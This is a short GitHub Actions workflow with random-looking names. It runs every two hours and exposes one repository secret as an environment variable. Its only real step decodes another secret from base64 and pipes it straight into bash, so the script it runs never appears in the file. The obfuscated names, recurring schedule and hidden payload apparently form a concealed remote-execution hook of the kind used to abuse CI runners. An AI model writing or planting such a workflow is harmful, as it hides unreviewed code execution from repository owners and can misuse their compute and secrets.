name: DXsrZh
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  mmOqaatpIZ:
    runs-on: ubuntu-22.04
    env:
      pbAzZh: ${{ secrets.RhHEjAKJml }}
    steps:
      - uses: actions/checkout@v5
      - run: echo "${{ secrets.oBpMzHV }}" | base64 -d | bash